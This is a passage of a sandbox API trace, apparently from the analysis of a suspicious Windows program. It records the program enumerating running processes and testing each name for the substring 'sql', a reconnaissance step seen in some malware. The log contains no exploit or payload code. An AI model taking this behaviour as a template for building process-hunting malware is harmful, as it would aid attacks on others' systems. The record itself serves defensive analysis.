lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0218.761] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x3586b10 [0218.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x3586b10, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="System", lpUsedDefaultChar=0x0) returned 7 [0218.761] lstrcpyA (in: lpString1=0x567fabc, lpString2="System" | out: lpString1="System") returned="System" [0218.761] StrStrIA (lpFirst="System", lpSrch="sql") returned 0x0 [0218.761] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0218.763] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0218.763] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3582648 [0218.763] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x3582648, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 9 [0218.763] lstrcpyA (in: lpString1=0x567fabc, lpString2="smss.exe" | out: lpString1="smss.exe") returned="smss.exe" [0218.763] StrStrIA (lpFirst="smss.exe", lpSrch="sql") returned 0x0 [0218.763] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0218.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0218.764] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3582450 [0218.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x3582450, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0218.765] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0218.765] StrStrIA (lpFirst="csrss.exe", lpSrch="sql") returned 0x0 [0218.765] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0218.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0218.766] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35825b8 [0218.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x35825b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 12 [0218.766] lstrcpyA (in: lpString1=0x567fabc, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0218.766] StrStrIA (lpFirst="wininit.exe", lpSrch="sql") returned 0x0 [0218.766] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0218.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0218.767] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3582480 [0218.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x3582480, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0218.768] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0218.768] StrStrIA (lpFirst="csrss.exe", lpSrch="sql") returned 0x0 [0218.768] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0218.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0218.769] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3582660 [0218.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x3582660, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 13 [0218.769] lstrcpyA (in: lpString1=0x567fabc, lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0218.769] StrStrIA (lpFirst="winlogon.exe", lpSrch="sql") returned 0x0 [0218.769] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0218.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0218.770] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3582678 [0218.778] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x3582678, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 13 [0218.778] lstrcpyA (in: lpString1=0x567fabc, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0218.778] StrStrIA (lpFirst="services.exe", lpSrch="sql") returned 0x0 [0218.778] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0218.779] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0218.779] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3582498 [0218.780] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x3582498, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 10 [0218.780] lstrcpyA (in: lpString1=0x567fabc, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0218.780] StrStrIA (lpFirst="lsass.exe", lpSrch="sql") returned 0x0 [0218.780] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.783] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0218.783] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3582468 [0218.783] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3582468, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0218.783] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0218.783] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0218.783] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x220, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0218.784] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0218.784] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x35824b0 [0218.785] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x35824b0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0218.785] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0218.785] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="sql") returned 0x0 [0218.785] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0218.786] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0218.786] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x35824e0 [0218.786] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x35824e0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0218.786] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0218.786] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="sql") returned 0x0 [0218.786] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.794] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0218.794] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3582690 [0218.795] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3582690, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0218.795] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0218.795] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0218.795] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x220, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0218.796] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0218.796] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x357e348 [0218.797] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x357e348, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 8 [0218.797] lstrcpyA (in: lpString1=0x567fabc, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0218.797] StrStrIA (lpFirst="dwm.exe", lpSrch="sql") returned 0x0 [0218.797] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x68, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.798] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0218.798] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3582558 [0218.798] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3582558, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0218.798] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0218.799] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0218.799] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.800] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0218.800] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35826a8 [0218.800] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35826a8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0218.800] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0218.800] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0218.800] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.801] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0218.802] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35825a0 [0218.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35825a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0218.802] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0218.802] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0218.802] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.803] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0218.803] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35826c0 [0218.803] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35826c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0218.803] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0218.803] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0218.804] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x350, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.805] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0218.805] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35823f0 [0218.805] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35823f0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0218.805] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0218.805] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0218.805] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x434, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.807] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0218.807] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3582438 [0218.807] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3582438, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0218.807] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0218.807] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0218.807] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x554, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0218.808] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35824f8 [0218.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35824f8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0218.808] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0218.808] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0218.808] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.809] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0218.809] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3582540 [0218.810] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3582540, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0218.810] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0218.810] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0218.810] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.811] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0218.811] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3582510 [0218.811] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3582510, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0218.811] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0218.811] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0218.811] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.812] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0218.812] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3582528 [0218.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3582528, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0218.813] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0218.813] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0218.813] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0218.814] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0218.814] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3582570 [0218.814] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x3582570, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", 